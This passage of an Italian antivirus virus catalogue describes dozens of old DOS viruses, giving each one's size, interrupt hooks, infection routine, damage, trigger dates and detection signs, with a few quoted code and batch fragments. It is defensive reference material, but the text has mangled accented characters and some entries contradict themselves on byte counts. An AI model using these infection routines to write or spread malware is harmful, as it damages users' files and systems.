Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Virus-90] Nome del Virus: Virus-90. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 857 Byte (COM). Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria agganciando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: I file con estensione *.COM infetti aumentano di 857 Byte. Metodo di rilevazione: Compare la scritta "Infected" quando un file risulta infetto. Note: 1) Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Lehigh] Nome del Virus: Lehigh. Pseudonimo: Nessuno. Tipo di Virus: Virus parassita (infetta solo COMMAND.COM ). Lunghezza del Virus: 555 Byte. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria agganciando l'INT 21h. 2) Quando si accede ad un disco e COMMAND.COM non Φ infetto, il virus lo infetta immediatamente ed esegue il file originale. 3) Il virus caricato in memoria controlla ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: 1) Infetta il file COMMAND del disco con estensione *.COM che aumenta di 555 Byte. 2) Quando il conteggio dell'infezione Φ superiore a quattro, il disco corrente viene reso inutilizzabile. [Como] Nome del Virus: Como. Tipo di Virus: Virus da file. Lunghezza del Virus: 2.020/2.030 Byte (EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Il virus cerca i file con estensione *. EXE nella directory corrente. 2) Controlla che il file sia stato infettato. Se "Si", continua a cercare. 3) Se viene trovato un file non infetto, esiste il 50% di possibilitα che venga infettato. Metodo di infezione: 1) Il virus infetta i file utilizzando AH=4B nell'INT 21h. Quando Φ in esecuzione un programma non infetto, viene infettato dal virus. 2) Prima che i file siano infettati, compare la scritta: "It's your task to find and delete them, best wishes. Press a key to execute the prompt." Danni: Nessuno. Metodo di rilevazione: Il virus aumenta la lunghezza del file di 2.020/2.030 Byte. Note: 1) Non rimane in memoria. 2) Prima di infettare i file, il virus intercetta l'INT 24h per omettere messaggi d'errore I/O. [512] Nome del Virus: 512. Tipo di Virus: Virus da file. Lunghezza del Virus: 512 Byte. Sintomi: Nessuno. Procedura eseguita: Il virus non contiene nessuna funzione di danneggiamento, ma il suo metodo di diffusione rappresenta un grave pericolo per il file infetto. L'inizio del file viene salvato in uno spazio libero di un determinato cluster. Mentre si copia il programma, questa parte non viene copiata insieme al resto del file, causando la distruzione del programma originale. Altri problemi che insorgono al file sono: quando viene letto un file infetto, con il virus giα in memoria, viene riconosciuto come flag del virus solo l'ora dell'ultima modifica (62 secondi) e non il contenuto del file. Lo stesso flag Φ utilizzato dai virus 648 e 1.560 ed alcuni utenti hanno i loro programmi immunizzati contro il virus 648. Il risultato Φ che i dati senza senso allocati alla fine del file infetto vengono letti al posto del contenuto del file. [744] Nome del Virus: 744. Tipo di Virus: Virus parassita. Lunghezza del Virus: 744 Byte. Sintomi: I file infetti aumentano di 744 Byte. I programmi distrutti causano, in molti casi, il blocco del computer. Danni: Con una probabilitα su sette il virus non infetta altri file ma distrugge quello trovato. Il virus scrive l'istruzione JMP [BP+0] all'inizio del programma. Il virus contiene un errore. Potrebbe scrivere l'istruzione JMP F000:FFF0 (riavvio del computer - uguale al virus 648), che dista 4 Byte dalla reale istruzione scritta. La lunghezza del programma alterato rimane invariata. uesto programma contiene un flag del virus. Usa gli interrupt del DOS "read and write". Quando il virus trova un programma infettabile, o legge e senza apporvi modifiche, scrive sul settore numero 1 (area FAT). Ci≥ non si verifica nel disco C:. Viene fatto per valutare che il disco sia protetto da scrittura. [1800] Nome del Virus: 1800. Pseudonimo: Bulgarian virus, Sofia virus, Dark Avenger Virus. Type: Virus parassita. Lunghezza del Virus: circa 1.800 Byte. Sintomi: I file infetti aumentano di circa 1.800 Byte nel caso di file con estensione *.EXE, il virus esegue l'allineamento del paragrafo). Diminuisce la memoria RAM libera. I file infetti contengono la seguente stringa: "Eddie lives...somewhere in time!", "Diana P." a "This program was written in the city of Sofia (C) 1988-89 Dark Avenger." Danni: Il virus legge il settore di boot del disco e vi segna il numero dei programmi (offset 10, versione decimale OEM) che girano dal dischetto dato MOD 16. Se tale numero Φ zero (dopo ogni 16 programmi !!), sovrascrive cluster scelti a caso sul disco, con parti del proprio codice. Il numero del cluster viene quindi immagazzinato nel settore di boot alla posizione offset 8 (OEM main version). Modifica il settore di boot e scrive sul disco. [V2000] Nome del Virus: V2000. Pseudonimo: 21 century virus. Tipo di Virus: Virus parassita. Lunghezza del Virus: 2.000 Byte. Sintomi: I file con estensione *.COM ed *.EXE infetti aumentano di 2.000 Byte. La memoria RAM libera diminuisce di 4KB. I file infetti contengono la seguente stringa: "(C) 1989 by Vesselin Bontchev" Danni: Nessuno. [2343] Nome del Virus: 2343. Pseudonimo: Flip virus. Tipo di Virus: Virus multipartito. Lunghezza del Virus: 2.343 Byte. Sintomi: I file con estensione *.COM ed *.EXE infetti aumentano di 2.343 Byte. La memoria RAM libera diminuisce di di 2.864 Byte. E' implementata la nuova funzione 0FE01h di DOS, quando il virus Φ attivo in memoria, ritorna 01FEh nel registro AX. Word 028h nel settore DPT contiene il valore 0FE01h. Flip ha lo stesso flag dei virus 648, 1560 (ALABAMA) e 512 regola il numero dei secondi del tempo di stampa dei file sul valore senza senso di 62 secondi. I file infetti contengono la seguente stringa: "OMICRON by PsychoBlast" Danni: In certe condizioni il virus spegne lo schermo. Se Φ attiva la funzione di danneggiamento, il virus contiene un bit rovesciato del font 8*14 dello schermo e monitorizza l'interrupt 10h. Quando viene cambiata la modalitα video con la modalitα 2 o 3, la funzione speciale per l'interrupt 1Ch Φ attivata. Tutte le altre modalitα del video hanno l'int 21h impostato come un'istruzione IRET. Per le modalitα del video 2 e 3, l'indirizzo di partenza Φ impostato su 1.000h. Viene utilizzata come memoria video quella situata al segmento 0BA00h anzichΘ al 0BA00h. Ad ogni chiamata di interrupt 1Ch (18.2 volte al secondo), il virus copia 500 parole (caratteri e loro attributi) dal segmento di memoria 0B800h al segmento 0BA00h invertendo righe e colonne. [Pojer] Nome del Virus: Pojer. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM ed *.EXE infetti aumentano di 1.919 Byte. Vettore PC agganciato: INT 21h e INT 24h. Procedura eseguita: 1) Controlla che sia giα in memoria. Se "NO", intercetta l'INT 21h e si colloca in memoria alta, quindi esegue il programma di cui Φ ospite. 2) Se Φ giα nella memoria alta, esegue immediatamente il programma. Metodo di infezione: 1) Il virus infetta i file AH=4B nell'INT 21h. I file non infetti sono infettati quando eseguiti. 2) Prima di infettare i file, Pojer intercetta l'INT 24h per ignorare errori di I/O. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 1.919 Byte. [Drop] Nome del Virus: Drop. Virus. Type: Virus parassita. Lunghezza del Virus: I file con estensione *.EXE infetti aumentano di 1.130-1.155 Byte ed i file con estensione *.COM di 1.131 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si colloca in memoria alta ed esegue il programma (Se Φ giα in memoria alta, il programma viene eseguito direttamente). 2) Controlla la data di sistema. Se Φ il giorno 6 di ogni mese, intercetta l'INT 21h. I caratteri sullo schermo cadono ed il sistema si blocca ogni volta che viene eseguito un programma. Metodo di infezione: 1) Il virus infetta i file AH=4B nell'INT 21h. I file non infetti sono infettati quando eseguiti. 2) Prima di infettare i file Drop non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. Danni: Vedi "Procedura eseguita 2)" Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 1.130-1.155 Byte. [Ha] Nome del Virus: Ha. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.EXE infetti aumentano di 1.458-1.468 Byte ed i file con estensione *.COM di 1.462 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si colloca in memoria alta ed esegue il programma. 2) Se Φ giα in memoria alta, il programma viene eseguito direttamente. Metodo di infezione: Il virus infetta i file AH=4B nell'INT 21h. I file non infetti sono infettati quando eseguiti. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 1.458-1.468 Byte. [LCT] Nome del Virus: Lct. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 599 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.COM nella directory corrente. 2) Il virus controlla che il file sia stato infettato. Se "SI", il virus continua la ricerca finchΦ trova un file non infetto da infettare. Il virus non interrompe la ricerca finchΦ l'ultimo file con estensione *.COM Φ infettato. Danni: Il virus controlla la data di sistema. Il giorno 25 dicembre, ogni volta che viene eseguito un file infetto, solo il codice del virus viene eseguito. Il programma quindi termina ed i programmi non vengono eseguiti. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 599 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [NPOX-Var] Nome del Virus: Npox-var. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 1.000 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Il virus cerca un file con estensione *.COM nella directory corrente. 2) Controlla che il file sia infetto. Se "SI", il virus continua la ricerca fino a quando trova un file non infetto e procede alla sua infezione. (Il virus infetta un solo file alla volta.) Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 1.000 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. 3) Il virus inizia con: INC BX PUSH AX POP AX DEC BX JMP XXXX [Bur-560h] Nome del Virus: Bur-560h. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti non variano di lunghezza (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Il virus cerca i file con estensione *.COM attraverso il percorso corrente. 2) Controlla che il file sia infetto. Se "SI", il virus continua la ricerca fino a quando trova un file non infetto e procede alla sua infezione. (Infetta un solo file alla volta). Danni: Il virus infetta i file sovrascrivendo il file originale, cosicchΦ la lunghezza del file non varia e le funzioni d ei file originali non possono venire eseguite. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Benoit] Nome del Virus: Benoit. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 1.183 Byte (Non infetta i file con estensione *.EXE). Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Dopo che si Φ installato in memoria, controlla che vi rimanga. Se "NO", il virus intercetta l'INT 21h, permane nella memoria principale e fa girare il programma. 2) Se il virus Φ giα in memoria, il programma viene eseguito direttamente. Metodo di infezione: 1) Infetta il file da "AH=4B" nell'INT 21h. Quando viene eseguito un file infetto, procede alla sua infezione (Non infetta i file con estensione *.COM). 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza d ei file aumenta di 1.183 Byte. [Hallo] Nome del Virus: Hallo. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 496 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nel disco corrente. 2) Controlla che il file sia infetto. Se "SI", continua la ricerca di un file non infetto e procede alla sua infezione. (Infetta un solo file alla volta). Dopo che il file Φ stato infettato, compare la scritta: "I have got a virus for you!". Danni: Nessuno. Metodo di rilevazione: Valutare se la stringa: "I have got a virus for you!" compare quando si esegue un programma e se la lunghezza dei file aumenta di 599 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Allerbmu] Nome del Virus: Allerbmu. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 359 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI", continua la ricerca. 3) Se viene trovato un file non infetto, il virus procede alla sua infezione. (Il virus infetta un solo file alla volta). 4) Controlla la data del PC. Quando la data Φ luned∞, il virus distrugge tutti i file sull'hard disk, facendo comparire il messaggio: "+ ALLERBMU NORI +(c) 1991........................" Danni: Riferiti alla procedura eseguita punto 4). Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 359 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Findm-608] Nome del Virus: Findm-608. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 608-623 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI", continua la ricerca di un file non infetto. 3) Quando lo trova, procede alla sua infezione. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 608-623 Byte. Note: 1) La parte infettata dal virus non viene scritta correttamente. La maggiorparte dei file infetti non pu≥ essere eseguita normalmente (anche il virus non Φ in grado di infettare o di danneggiare). 2) Non rimane in memoria. 3) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [ARCV-2] Nome del Virus: Arcv-2. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.EXE infetti aumentano di 693 Byte. (Non infetta i file con estensione *.COM). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Cerca un file con estensione *.EXE nella directory corrente. 2) Controlla che sia infetto. Se "SI", il virus continua la ricerca. 3) Quando trova un file infetto, il virus procede alla sua infezione. (Infetta un solo file alla volta). 4) Il virus controlla la data del sistema. Se il mese Φ aprile od il giorno 6, il virus mostra sullo schermo: "Help .. Help .. I'm Sinking ........" Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 693 Byte. Note: 1) La parte infettata dal virus non viene scritta correttamente. La maggiorparte dei file infetti non pu≥ essere eseguita normalmente (anche il virus non Φ in grado di infettare o di danneggiare). 2) Non rimane in memoria. 3) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Hallo-759] Nome del Virus: Hallo-759. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 533 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI", continua la ricerca fino a quando trova un file non infetto, procedendo quindi alla sua infezione. (Infetta un solo file alla volta). Dopo tale operazione compare la stringa: "I have got a virus for you!". Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando compare la stringa "I have got a virus for you!" all'esecuzione di un programma e quando la lunghezza dei file aumenta di 759-775 Byte. Note: 1) La parte infettata dal virus non viene scritta correttamente. Completata l'infezione il file termina ed il sistema si blocca. 2) Non rimane in memoria. 3) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Atomic-2A] Nome del Virus: Atomic-2a. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 350 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI", continua la ricerca fino a quando trova un file non infetto, procedendo quindi alla sua infezione. (Infetta un solo file alla volta.) Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 350 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Atomic-1B] Nome del Virus: Atomic-1b. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti non aumentano. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Se la data di sistema Φ il giorno 1, compare la scritta: "The Atomic Dustbin--YOUR PHUCKED!" Il sistema quindi si blocca. 2) Se la data di sistema Φ il giorno 26, prima che il sistema si blocchi, compare il messaggio: "The Atomic Dustbin 1B -- This is almost the second step !" 3) Se la data di sistema non Φ nΘ il giorno 1 nΘ il giorno 26: i) il virus ricerca tutti i file con estensione *.COM nella directory corrente; ii) controlla che il file sia infetto. Se "SI", continua la ricerca; iii) se trova un file non infetto, procede alla sua infezione. (Infetta solo due file alla volta). Dopo l'infezione compare la stringa: "Program execution terminated." Danni: Nessuno. Metodo di rilevazione: Diagnosticabile se la stringa: "Program execution terminated" compare all'esecuzione di un programma. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Atomic-1A] Nome del Virus: Atomic-1A. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti non aumentano. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Se la data di sistema Φ il giorno 25, compare la stringa: "The Atomic Dustbin 1A -- This is almost the first step!" ed il sistema si blocca. 2) Se la data di sistema non Φ il giorno 25: i) il virus cerca un file con estensione *.COM nella directory corrente; ii) controlla che sia infetto. Se "SI", continua la ricerca; iii) se trova un file non infetto, procede alla sua infezione. (Infetta solo due file alla volta). Dopo l'infezione compare la stringa: "Bad command or file name". Danni: Nessuno. Metodo di rilevazione: Diagnosticabile se la stringa: "bad command or file name" compare all'esecuzione di un programma. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Arusiek] Nome del Virus: Arusiek. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM ed *.EXE infetti aumentano di 817 Byte. Vettore PC agganciato: INT 21h ed INT 24h. Procedura eseguita: 1) Controlla che sia giα in memoria. Se "NO", il virus intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se si trova giα in memoria, il programma viene eseguito direttamente. Metodo di infezione: 1) Infetta i file da AH=4B nell'INT 21h. I file non infetti vengono infettati alla loro esecuzione. 2) Prima di infettare i file, il virus intercetta l'INT 24h in modo da ignorare gli errori I/O. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 817 Byte. [Atas-3] Nome del Virus: Atas-3. Tipo di Virus: Virus parassita. Lunghezza del Virus: : I file con estensione *.COM ed *.EXE infetti aumentano di 1.268 Byte. Vettore PC agganciato: INT 21h ed INT 24h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si inserisce in memoria ed esegue il programma. 2) Se Φ giα in memoria, il programma viene eseguito direttamente. Metodo di infezione: 1) Infetta i file da AH=4B nell'INT 21h. I file non infetti sono infettati alla loro esecuzione. 2) Prima di infettare i file, il virus intercetta l'INT 24h in modo da ignorare gli errori I/O. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 1.268 Byte. [ARCV-570] Nome del Virus: Arcv-570. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.EXE infetti aumentano di 570-585 Byte. (Non infetta i file con estensione *.COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.EXE nella directory corrente. 2) Controlla che il file sia infetto. Se "SI", continua la ricerca fino a quando trova un file non infetto, procedendo quindi alla sua infezione. (Infetta un solo file alla volta). Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 570-585 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Atas-3215] Nome del Virus: Atas-3215- Tipo di Virus: Virus parassita. Lunghezza del Virus: Circa 3.215 Byte. (Esistono diverse varianti.) Vettore PC agganciato: INT 21h. Procedura eseguita: (Il virus infetta file solo in DOS 3.3). 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h e si inserisce in memoria, eseguendo il programma originale. 2) Se Φ giα in memoria, il programma viene eseguito direttamente. Metodo di infezione: 1) Infetta i file da AH=4B nell'INT 21h. I file non infetti sono infettati alla loro esecuzione. [Andromda] Nome del Virus: Andromda. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 1.140 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che il file sia infetto. Se "SI", continua la ricerca fino a quando trova un file non infetto. 3) Procede quindi ad effettuare l'infezione (infetta solo due file alla volta). Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 1.140 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Grunt-529] Nome del Virus: Grunt-529. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 529 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI", continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. (Infetta un solo file alla volta.) 4) Controlla la data di sistema. Se la data Φ venerd∞ e l'anno Φ successivo al 1993, il virus mostra sullo schermo il seguente messaggio: "Nothing like the smell of napalm in the morning!" Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 529 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Ein-Volk] Nome del Virus: Ein-Volk. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 482 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI", continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. Non interrompe la ricerca fino a quando tutti i file con estensione *.COM della directory sono infettati. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 482 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [DOS7] Nome del Virus: Dos7. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 342 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI", continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. (Infetta un solo file alla volta). Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 342 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Dooms-715] Nome del Virus: Dooms-715. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 715 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory principale. 2) Controlla che sia infetto. Se "SI", continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. (Infetta un solo file alla volta). Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 715 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Dir-522] Nome del Virus: Dir-522. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 1268 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: INT 21h ed INT 24h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se Φ giα in memoria, il programma viene eseguito direttamente. Metodo di infezione: 1) Il virus infetta i file dal comando "dir". Quando viene eseguito questo comando, il virus cerca un file non infetto e procede alla sua infezione. 2) Prima di infettare i file, il virus intercetta l'INT 24h in modo da ignorare errori I/O. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 522 Byte. [Compan-83] Nome del Virus: Compan-83. Tipo di Virus: Virus parassita. Lunghezza del Virus: 83 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, si installa in memoria ed esegue il programma. 2) Se Φ giα in memoria, il programma viene eseguito direttamente. Metodo di infezione: 1) Il virus infetta i file da AH=4B nell'INT 21h. Quando viene eseguito un file con estensione *.EXE, il virus crea un file con estensione *.COM della lunghezza di 83 Byte. Il contenuto del file con estensione *.COM Φ il virus stesso (file nascosto). 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 83 Byte. [ChipShit] Nome del Virus: Chipshit. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 877 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Controlla la data del sistema. Se Φ successiva al giorno 11 febbraio 1993, il virus mostra sullo schermo il seguente messaggio: "Hej! Tu wirus chipshit! Co........" 2) Se la data Φ precedente al giorno 11 febbraio 1993: a) Cerca un file con estensione *.COM nella directory corrente. b) Controlla che sia infetto. Se "SI", continua la ricerca. c) Se trova un file non infetto, procede alla sua infezione. (Infetta un solo file alla volta). Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 877 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Carbuncl] Nome del Virus: Carbuncl. Tipo di Virus: Virus parassita. Lunghezza del Virus: 622 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Con 5 probabilitα su 6: i) Cerca un file con estensione *.EXE nella directory corrente. ii) Rinomina il file come *.crp e crea un file *.bat con il seguente comando: @ECHO OFF CARBUNCL RENAME JEXE.CRP JEXE.EXE JEXE.EXE RENAME JEXE.EXE JEXE.CRP CARBBUNCL (JEXE.EXE Φ il file infetto e CARBUNCL Φ il virus) iii) Ripete la suddetta procedura fino a quando tutti i file con estensione *.EXE sono infettati. 2) Con 1 probabilitα su 6: infetta 5 file con estensione *.CRP. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 877 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [VCL-2] Nome del Virus: Vcl-2. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM infetti aumentano di 663 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia infetto. Se "SI",continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. (Infetta solo due file alla volta). Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 663 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Necro] Nome del Virus: Necro. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM ed estensione *.EXE infetti aumentano di 696 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file file con estensione *.COM od estensione *.EXE infetto. 2) Controlla che sia stato infettato. Se "SI",continua la ricerca. 3) Se trova un file non infetto, procede alla sua infezione. (Infetta solo tre file alla volta). Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 696 Byte. Note: 1) La porzione infetta non viene scritta correttamente, cosicchΦ la maggiorparte dei file infetti non pu≥ essere eseguita (anche il virus non Φ in grado di infettare o di danneggiare). 2) Non rimane in memoria. 3) Prima di infettare i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore quando si verifica un erore I/O. [Eagl-7705] Nome del Virus: Eagl-7705. Tipo di Virus: Virus parassita. Lunghezza del Virus: 7.705 Byte. Procedura eseguita: 1) Cerca un file con estensione *.EXE nella directory corrente. 2) Crea quindi un file con estensione *.COM di lunghezza pari a 7.705 Byte. Il contenuto del file con estensione *.COM Φ il virus stesso (file nascosto). 3) Ripete la procedura fino a quando tutti i file con estensione *.EXE nella directory corrente sono infettati. Danni: Nessuno. Metodo di rilevazione: Diagnosticabile quando la lunghezza dei file aumenta di 7.705 Byte. Note: Non rimane in memoria. [Eno-2430] Nome del Virus: Eno-2430. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file con estensione *.COM ed estensione *.EXE infetti aumentano 